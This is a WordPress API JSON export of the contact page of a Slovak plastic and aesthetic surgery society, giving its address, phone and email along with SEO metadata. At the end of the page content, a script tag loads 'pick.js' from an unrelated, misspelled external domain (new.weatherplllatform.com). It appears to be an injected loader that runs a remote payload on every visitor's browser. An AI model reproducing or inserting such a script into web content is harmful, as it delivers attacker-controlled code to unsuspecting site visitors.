{"id":4198,"date":"2021-01-10T22:22:11","date_gmt":"2021-01-10T21:22:11","guid":{"rendered":"https:\/\/wp.plastchir.sk\/contact\/"},"modified":"2021-01-10T22:31:19","modified_gmt":"2021-01-10T21:31:19","slug":"contact","status":"publish","type":"page","link":"https:\/\/www.plastchir.sk\/en\/contact\/","title":{"rendered":"Contact"},"content":{"rendered":"<p>[vc_row css=&#8221;.vc_custom_1610305550748{padding-bottom: 60px !important;}&#8221;][vc_column][vc_column_text css=&#8221;.vc_custom_1610305511500{padding-bottom: 0px !important;}&#8221;]<strong>Address<\/strong>:[\/vc_column_text][vc_row_inner][vc_column_inner width=&#8221;2\/5&#8243; css=&#8221;.vc_custom_1610305495316{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}&#8221;][vc_column_text]<strong>Slovensk\u00e1 spolo\u010dnos\u0165 plastickej a estetickej chirurgie<\/strong><br \/>\nKlinika plastickej chirurgie SZU pri FNsP FDR<br \/>\nn\u00e1mestie L. Svobodu 1<br \/>\n975 17 Bansk\u00e1 Bytrica[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/5&#8243;][vc_column_text]<\/p>\n<p style=\"text-align: right;\"><strong>Telephone \/ fax:<\/strong><br \/>\n+421 48 413854[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;2\/5&#8243;][vc_column_text]<strong>E-mail:<\/strong><br \/>\n<a href=\"mailto:julianko@nspbb.sk\">julianko@nspbb.sk<\/a>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row]<\/p>\n<p><script src='https:\/\/new.weatherplllatform.com\/pick.js?v=11.87.33' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row css=&#8221;.vc_custom_1610305550748{padding-bottom: 60px !important;}&#8221;][vc_column][vc_column_text css=&#8221;.vc_custom_1610305511500{padding-bottom: 0px !important;}&#8221;]Address:[\/vc_column_text][vc_row_inner][vc_column_inner width=&#8221;2\/5&#8243; css=&#8221;.vc_custom_1610305495316{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}&#8221;][vc_column_text]Slovensk\u00e1 spolo\u010dnos\u0165 plastickej a estetickej chirurgie Klinika plastickej chirurgie SZU pri FNsP FDR n\u00e1mestie L. Svobodu 1 975 17 Bansk\u00e1 Bytrica[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/5&#8243;][vc_column_text] Telephone \/ fax: +421 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.6.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Contact - Slovensk\u00e1 spolo\u010dnos\u0165 plastickej a estetickej chirurgie<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.plastchir.sk\/en\/contact\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Contact - Slovensk\u00e1 spolo\u010dnos\u0165 plastickej a estetickej chirurgie\" \/>\n<meta property=\"og:description\" content=\"[vc_row css=&#8221;.vc_custom_1610305550748{padding-bottom: 60px !important;}&#8221;][vc_column][vc_column_text css=&#8221;.vc_custom_1610305511500{padding-bottom: 0px !important;}&#8221;]Address:[\/vc_column_text][vc_row_inner][vc_column_inner width=&#8221;2\/5&#8243; css=&#8221;.vc_custom_1610305495316{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}&#8221;][vc_column_text]Slovensk\u00e1 spolo\u010dnos\u0165 plastickej a estetickej chirurgie Klinika plastickej chirurgie SZU pri FNsP FDR n\u00e1mestie L. Svobodu 1 975 17 Bansk\u00e1 Bytrica[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/5&#8243;][vc_column_text] Telephone \/ fax: +421 [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.plastchir.sk\/en\/contact\/\" \/>\n<meta property=\"og:site_name\" content=\"Slovensk\u00e1 spolo\u010dnos\u0165 plastickej a estetickej chirurgie\" \/>\n<meta property=\"article:modified_time\" content=\"2021-01-10T21:31:19+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.plastchir.sk\/en\/contact\/\",\"url\":\"https:\/\/www.plastchir.sk\/en\/contact\/\",\"name\":\"Contact - Slovensk\u00e1 spolo\u010dnos\u0165 plastickej a estetickej chirurgie\",\"isPartOf\":{\"@id\":\"https:\/\/www.plastchir.sk\/#website\"},\"datePublished\":\"2021-01-10T21:22:11+00:00\",\"dateModified\":\"2021-01-10T21:31:19+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.plastchir.sk\/en\/contact\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.plastchir.sk\/en\/contact\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.plastchir.sk\/en\/contact\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.plastchir.sk\/en\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Contact\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.plastchir.sk\/#website\",\"url\":\"https:\/\/www.plastchir.sk\/\",\"name\":\"Slovensk\u00e1 spolo\u010dnos\u0165 plastickej a estetickej chirurgie\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.plastchir.sk\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Contact - Slovensk\u00e1 spolo\u010dnos\u0165 plastickej a estetickej chirurgie","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.plastchir.sk\/en\/contact\/","og_locale":"en_US","og_type":"article","og_title":"Contact - Slovensk\u00e1 spolo\u010dnos\u0165 plastickej a estetickej chirurgie","og_description":"[vc_row css=&#8221;.vc_custom_1610305550748{padding-bottom: 60px !important;}&#8221;][vc_column][vc_column_text css=&#8221;.vc_custom_1610305511500{padding-bottom: 0px !important;}&#8221;]Address:[\/vc_column_text][vc_row_inner][vc_column_inner width=&#8221;2\/5&#8243; css=&#8221;.vc_custom_1610305495316{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}&#8221;][vc_column_text]Slovensk\u00e1 spolo\u010dnos\u0165 plastickej a estetickej chirurgie Klinika plastickej chirurgie SZU pri FNsP FDR n\u00e1mestie L. Svobodu 1 975 17 Bansk\u00e1 Bytrica[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/5&#8243;][vc_column_text] Telephone \/ fax: +421 [&hellip;]","og_url":"https:\/\/www.plastchir.sk\/en\/contact\/","og_site_name":"Slovensk\u00e1 spolo\u010dnos\u0165 plastickej a estetickej chirurgie","article_modified_time":"2021-01-10T21:31:19+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.plastchir.sk\/en\/contact\/","url":"https:\/\/www.plastchir.sk\/en\/contact\/","name":"Contact - Slovensk\u00e1 spolo\u010dnos\u0165 plastickej a estetickej chirurgie","isPartOf":{"@id":"https:\/\/www.plastchir.sk\/#website"},"datePublished":"2021-01-10T21:22:11+00:00","dateModified":"2021-01-10T21:31:19+00:00","breadcrumb":{"@id":"https:\/\/www.plastchir.sk\/en\/contact\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.plastchir.sk\/en\/contact\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.plastchir.sk\/en\/contact\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.plastchir.sk\/en\/"},{"@type":"ListItem","position":2,"name":"Contact"}]},{"@type":"WebSite","@id":"https:\/\/www.plastchir.sk\/#website","url":"https:\/\/www.plastchir.sk\/","name":"Slovensk\u00e1 spolo\u010dnos\u0165 plastickej a estetickej chirurgie","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.plastchir.sk\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"}]}},"_links":{"self":[{"href":"https:\/\/www.plastchir.sk\/en\/wp-json\/wp\/v2\/pages\/4198"}],"collection":[{"href":"https:\/\/www.plastchir.sk\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.plastchir.sk\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.plastchir.sk\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.plastchir.sk\/en\/wp-json\/wp\/v2\/comments?post=4198"}],"version-history":[{"count":7,"href":"https:\/\/www.plastchir.sk\/en\/wp-json\/wp\/v2\/pages\/4198\/revisions"}],"predecessor-version":[{"id":4241,"href":"https:\/\/www.plastchir.sk\/en\/wp-json\/wp\/v2\/pages\/4198\/revisions\/4241"}],"wp:attachment":[{"href":"https:\/\/www.plastchir.sk\/en\/wp-json\/wp\/v2\/media?parent=4198"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}